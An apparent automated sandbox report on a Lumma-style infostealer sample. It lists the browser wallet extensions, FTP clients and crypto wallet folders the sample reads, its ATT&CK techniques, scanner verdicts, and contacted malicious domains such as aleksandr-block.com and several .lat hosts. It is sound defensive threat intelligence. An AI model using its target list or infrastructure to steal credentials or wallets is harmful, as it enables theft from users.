Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: Yara match | File source: 00000001.00000003.1473028075.0000000000706000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: yTRd6nkLWV.exe PID: 7532, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: yTRd6nkLWV.exe PID: 7532, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count shown in the matrix for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (12); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (21); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing; Steganography
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (221); Virtualization/Sandbox Evasion (21); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
yTRd6nkLWV.exe | 8% | Virustotal |
yTRd6nkLWV.exe | 37% | ReversingLabs | Win32.Spyware.Lummastealer
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://aleksandr-block.com/2 | 0% | Avira URL Cloud | safe
https://aleksandr-block.com/Q | 0% | Avira URL Cloud | safe
https://aleksandr-block.com/apizK | 0% | Avira URL Cloud | safe
https://aleksandr-block.com/pi | 0% | Avira URL Cloud | safe
https://login.steampowered.c | 0% | Avira URL Cloud | safe
https://aleksandr-block.com/A4 | 0% | Avira URL Cloud | safe
https://aleksandr-block.com/ob | 0% | Avira URL Cloud | safe
https://aleksandr-block.com/api | 0% | Avira URL Cloud | safe
https://aleksandr-block.com/pJ | 0% | Avira URL Cloud | safe
https://status.dropbox.com | 0% | Avira URL Cloud | safe
https://community.fastly.stea | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
aleksandr-block.com | 188.114.96.3 | true | true | | unknown
steamcommunity.com | 104.102.49.254 | true | false | | high
edge-block-www-env.dropbox-dns.com | 162.125.66.15 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
www-env.dropbox-dns.com | 162.125.66.18 | true | false | | high
finickypwk.lat | unknown | unknown | true | | unknown
washyceehsu.lat | unknown | unknown | true | | unknown
kickykiduz.lat | unknown | unknown | true | | unknown
shoefeatthe.lat | unknown | unknown | true | | unknown
bloodyswif.lat | unknown | unknown | true | | unknown
savorraiykj.lat | unknown | unknown | true | | unknown
www.dropbox.com | unknown | unknown | false | | high
miniatureyu.lat | unknown | unknown | true | | unknown
ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com | unknown | unknown | true | | unknown
leggelatez.lat | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
leggelatez.lat | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
kickykiduz.lat | false | | high
miniatureyu.lat | false | | high
finickypwk.lat | false | | high
shoefeatthe.lat | false | | high
https://aleksandr-block.com/api | true | Avira URL Cloud: safe | unknown
washyceehsu.lat | false | | high
savorraiykj.lat | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJEl | yTRd6nkLWV.exe | false | | high
https://duckduckgo.com/ac/?q= | yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://paper.dropbox.com/cloud-docs/edit | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.gstatic.cn/recaptcha/ | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aleksandr-block.com/A4 | yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.valvesoftware.com/legal.htm | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsi | yTRd6nkLWV.exe | false | | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://officeapps-df.live.com | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://s.ytimg.com; | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.login.yahoo.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.certum.pl/CPS0 | yTRd6nkLWV.exe | false | | high
https://login.yahoo.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://status.dropbox.com | yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.dr | false | Avira URL Cloud: safe | unknown
https://www.dropbox.com/playlist/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.innosetup.com/ | yTRd6nkLWV.exe | false | | high
https://onedrive.live.com/picker | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&am | yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly.steamstatic.com/steamcom | yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aleksandr-block.com/pJ | yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w | yTRd6nkLWV.exe | false | | high
https://www.ecosia.org/newtab/ | yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lv.queniujq.cn | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/profiles/76561199724331900/inventory/ | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com/ | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aleksandr-block.com/ob | yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css | yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.dr | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng | yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.sandbox.google.com/document/fsip/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am | yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/recaptcha/ | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://checkout.steampowered.com/ | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dl-web.dropbox.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://app.hellofax.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cfl.dropboxstatic.com/static/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aleksandr-block.com/pi | yTRd6nkLWV.exe, 00000001.00000003.1514906942.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1513735860.000000000339F000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1472950893.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1486212475.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.certum.pl/ctsca2021.crl0o | yTRd6nkLWV.exe | false | | high
https://aleksandr-block.com/apizK | yTRd6nkLWV.exe, 00000001.00000003.1557953970.000000000339E000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539498159.000000000339E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hellofax.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://help.steampowered.com/en/ | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://instructorledlearning.dropboxbusiness.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://recaptcha.net/recaptcha/; | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aleksandr-block.com/2 | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.dropbox.com/pithos/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://sales.dropboxbusiness.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://login.steampowered.c | yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a.sprig.com/ | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://broadcast.st.dl.eccdnx.com | yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/encrypted_folder_download/service_worker.js | yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a | yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://subca.ocsp-certum.com05 | yTRd6nkLWV.exe | false | | high
http://x1.c.lencr.org/0 | yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | yTRd6nkLWV.exe, 00000001.00000003.1500762013.000000000344E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://subca.ocsp-certum.com02 | yTRd6nkLWV.exe | false | | high
http://subca.ocsp-certum.com01 | yTRd6nkLWV.exe | false | | high
                                                                                                                                                                                      http://repository.certum.pl/ctnca2.cer09yTRd6nkLWV.exefalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.dropbox.com/static/api/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.dropbox.com/csp_log?policy_name=metaserver-dynamicyTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/workshop/yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://login.steampowered.com/yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allyTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cyTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/legal/yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://aleksandr-block.com/QyTRd6nkLWV.exe, 00000001.00000003.1486470955.00000000006FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1yTRd6nkLWV.exefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://docsend.com/yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engyTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/jyTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoyTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=BFN_yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.fastly.steayTRd6nkLWV.exe, 00000001.00000003.1558338882.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&ayTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
